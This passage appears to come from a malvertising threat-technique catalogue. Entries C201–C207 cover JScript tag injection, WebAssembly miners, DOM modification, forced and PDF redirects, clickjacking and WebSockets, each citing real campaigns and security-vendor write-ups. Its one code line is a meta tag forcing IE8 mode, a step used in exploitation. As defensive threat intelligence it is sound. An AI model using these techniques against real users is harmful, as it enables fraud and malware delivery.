[C201] JScript tag Injection
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
Procedure example: DarkHotel APT exploiting CVE-2019-1367
References [Confiant] DarkHotel APT exploiting CVE-2019-1367: https://blog.confiant.com/internet-explorer-cve-2019-1367-in-the-wild-exploitation-prelude-ef546f19cd30
[C202] WebAssembly injection
Technique Description: Malvertisers relies on WASM by introducing it into the execution of a page, ad creative, or other resource when it has no place in the legitimate execution of the application or ad.
Procedure example: Malvertisers quickly came up with multiple schemes to get miners into Browsers, resulting in a large number of in-the-wild WebAssembly-based miners available. These WASM miners appears to be minor variants of codebases available on GitHub. These ‘copycats’ are mostly tweaked in order to avoid detection, usually by altering function names or by completely removing references to the original C source.
References [Forcepoint] Browser mining coinhive and webassembly: https://www.forcepoint.com/blog/x-labs/browser-mining-coinhive-and-webassembly
[C203] HTML DOM modification
References [adtechmadness] how real malvertising solution works. Examples with appendChild(): https://adtechmadness.wordpress.com/2019/03/26/how-real-time-malvertising-solutions-works
[C204] Forceful redirects
Technique Description: Forceful redirects are the technique by which malvertisers redirect victims to a malicious landing page through no action of their own. Usually this is done by modifying the Location Object in the HTML DOM, and explicity pointing the href property to an attacker controlled URL.
Procedure example: VeryMal campaign leveraged click trackers in their redirect chain in order to drop a malicious fake Flash update.
References [Confiant] Confiant & Malwarebytes Uncover Steganography Based Ad Payload That Drops Shlayer Trojan On Mac Users: https://blog.confiant.com/confiant-malwarebytes-uncover-steganography-based-ad-payload-that-drops-shlayer-trojan-on-mac-cd31e885c202
[Confiant] eGobbler forcefull redirects: https://blog.confiant.com/hiding-in-plain-sight-how-one-malvertiser-abuses-typos-of-google-and-amazon-ad-serving-domains-6bfa6b42399d
[C205] PDF redirect
Technique Description: PDF redirect is a redirect technique that utilizes a malicious PDF document which will redirect the victim to the attacker's URL when the document is opened in the browser. Typically the PDF would be loaded automatically in order to bypass built-in browser redirect protection.
Procedure example: Zirconium threat actor abusing PDFium navigation actions of Chrome’s tabs API. circumventing Chrome's anti-redirect protection.
References [Confiant] Zirconium was one step ahead of Chrome's redirect blocker with 0-day: https://blog.confiant.com/zirconium-was-one-step-ahead-of-chromes-redirect-blocker-with-0-day-2d61802efd0d
[C206] Click Jacking
Technique Description: Click jacking is a technique used by malvertisers in order to hijack the click action of a user to get them to click on an invisible element that is controlled by the attacker. Threat actors overlays multiple transparent oropaque frames to trick a user into clicking on abutton or link on another page. Clicks meant for the visible page are hijacked and routed to another, invisible page.
Procedure example: clickjacking campaign abuses google adsense avoids adfraud bots
References [Malwarebytes] clickjacking campaign abuses google adsense avoids adfraud bots: https://blog.malwarebytes.com/cybercrime/2017/01/clickjacking-campaign-abuses-google-adsense-avoids-ad-fraud-bots
[Confiant] how bad ads hijack your browser with one simple trick: https://blog.confiant.com/how-bad-ads-hijack-your-browser-with-one-simple-trick-712ad3590a13
[lookingglasscyber] when good sites go bad malvertising and watering holes infographic: https://www.lookingglasscyber.com/blog/threat-intelligence-insights/when-good-sites-go-bad-malvertising-and-watering-holes-infographic
[C207] Web Socket
Technique Description: The WebSocket protocol, described in the specification RFC 6455 provides a way to exchange data between browser and server via a persistent connection. The data can be passed in both directions as “packets”, without breaking the connection and additional HTTP-requests.
WebSocket is especially great for services that require continuous data exchange, e.g. online games, real-time trading systems and so on. Malvertisers make use of web socket to send or execute received data from a server controlled by them.
Procedure example: DCCBoost using web sockets to send client-side fingerprinting values to the server side and executes the payload received.